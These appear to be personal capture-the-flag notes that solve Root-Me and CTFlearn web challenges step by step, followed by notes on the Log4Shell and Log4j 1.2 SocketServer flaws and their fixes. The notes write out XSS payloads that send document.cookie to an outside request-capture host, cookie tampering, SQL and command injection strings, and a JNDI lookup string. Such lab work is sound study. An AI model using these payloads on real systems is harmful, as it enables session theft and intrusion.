- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch18/
- Choose any title
- Enter <script>document.write("<img src=request_capturer_url"+document.cookie+"/>");</script> as message payload
- Simple xss attack
- Wait for the bot to load the image and thus the cookie stealer
- Copy the flag in the captured request cookie
- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch19/
- Choose any title
- Enter "><script>document.write(%22<img src=request_capturer_url?%22.concat(document.cookie.replace(%22 %22,%22&%22)).concat(%22 />%22))</script> as message payload
- We bypass angle brackets, quotation marks and encode the payload
- Wait for the bot to load the image and thus the cookie stealer
- Copy the admin cookie in the captured request
- Change the document cookie to the admin cookie
- Visit the admin section
- Copy the flag
- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch26/?p=exp' onmouseover='document.write(%22<img src=request_capturer_url?%22.concat(document.cookie).concat(%22 />%22))
- Exp' is the reflected xss, we want the document cookie, we encode the paylod
- Click on Report to the administrator
- Wait for the bot to load the image and thus the cookie stealer
- Copy the flag in the captured request cookie
- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch32/contact.php
- As a payload insert http://challenge01.root-me.org/web-client/ch32/index.php?number=%27%3Bdocument.location.href%3D%27https%3A%2F%2F6b6fea4abe6e6a0876505f85b3377c72.m.pipedream.net%2F%3Fitworks%3D%27.concat%28document.cookie%29%3B%2F%2F
- The url uses document.location to directly redirect, the url is url encoded, the payload breaks out of the client script by suffix '; and prefix // respectively
- Click on Submit
- Wait for the bot to click on the link
- Copy the flag in the captured request cookie
- Start curl interactively: curl -v http://challenge01.root-me.org/web-serveur/ch7/
- Make a POST request with the paylod mail=adm%4Dadm.de&jsep4b=send
- A cookie with visitor privileges is set
- Change the cookie value from visitor to admin
- Make a new GET request to receive the flag
- Visit http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt
- Copy the flag
- Set the header rootme admin to true through curl
- For this run curl --header "Header-RootMe-Admin: true" http://challenge01.root-me.org/web-serveur/ch5/
- Copy the flag from the response
- Copy your ipv4 address from ipconfig/ifconfig/netstat etc.
- Run curl -k http://challenge01.root-me.org/web-serveur/ch68/ -H "X-Forwarded-For: 'your_ipv4_address'"
- Copy the flag from the response
- Run curl -v http://challenge01.root-me.org/web-serveur/ch32/login.php?redirect
- Run curl -v http://challenge01.root-me.org/web-serveur/ch32/index.php?redirect
- Copy the flag from the response
- MD5 hash any site e.g. google.com
- Run a get curl for http://challenge01.root-me.org/web-serveur/ch52/ with url param set to the site and h param set to the hash
- Copy the flag from the response
- Run curl -X POST -F 'score=100000000' -F 'generate=Give+a+try%21' http://challenge01.root-me.org/web-serveur/ch56/
- Copy the flag from the response
- Set the user agent to admin (under Edge its in the dev tools Network conditions tab)
- Reload the page
- Copy the flag
- Run curl -v -X OPTIONS http://challenge01.root-me.org/web-serveur/ch8/
- Copy the flag from the response
- Visit https://noxtal.com/
- Open Dev Tools
- Go to Memory
- Create a snapshot
- Search for flag{
- Copy the flag and replace with CTFlearn{the_flag}
- Visit https://web.ctflearn.com/web4/
- Type in test' or '1 = 1
- Inside the results search for the flag
- Install gobuster
- Download the provided wordlist
- Execute gobuster -u https://gobustme.ctflearn.com -w ~/Downloads/common.txt
- Visit https://gobustme.ctflearn.com/hide
- Install curl
- Visit http://165.227.106.113/post.php
- Open up dev tools and look for the username and password
- Execute curl -X POST -F 'username=admin' -F 'password=71urlkufpsdnlkadsf' http://165.227.106.113/post.php
- Get the flag from the response
- Install curl
- Run curl -A "Sup3rS3cr3tAg3nt" -H "Referer: awesomesauce.com" http://165.227.106.113/header.php
- Get the flag from the response
- Visit https://web.ctflearn.com/web7/
- In the dev tools console enter document.getElementById("d").value = ";ls";
- Basic web command injection
- Press the equal sign
- Get the flag from the page
- Visit https://web.ctflearn.com/web8/?id=1+union+select+table_name,0x02,0x03,0x04%20from%20information_schema.tables to find the vulnerable table
- Visit https://web.ctflearn.com/web8/?id=1+union+select+(SELECT+*+from+w0w_y0u_f0und_m3),0x02,0x03,0x04 to get the flag
- Visit https://ctflearn.com/robots.txt
- Look for the disallow URL
- Vist https://ctflearn.com/70r3hnanldfspufdsoifnlds.html
- Get the flag from the page
- Visit https://www.base64decode.org/
- Decrypt the provided key
Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
2.12.1 and 2.13.0 through 2.15.0
From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed
Remote code execution
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);
public static void main(String[] args) {
logger.error("${jndi:ldap://127.0.0.1:1389/a}");
}
}- Restrict LDAP access via JNDI
- Disable most JNDI protocols
- Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
- Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0.
- Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true”
Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.
1.2 up to 1.2.17
2.8.2 or higher
Remote code execution
public SocketNode(Socket socket2, LoggerRepository hierarchy2) {
this.socket = socket2;
this.hierarchy = hierarchy2;
try {
this.ois = new ObjectInputStream(new BufferedInputStream(socket2.getInputStream()));
} catch (InterruptedIOException e) {
Thread.currentThread().interrupt();
logger.error(new StringBuffer().append("Could not open ObjectInputStream to ")
.append(socket2).toString(), e);
} catch (IOException e2) {
logger.error(new StringBuffer().append("Could not open ObjectInputStream to ")
.append(socket2).toString(), e2);
} catch (RuntimeException e3) {
logger.error(new StringBuffer().append("Could not open ObjectInputStream to ")
.append(socket2).toString(), e3);
}
}`
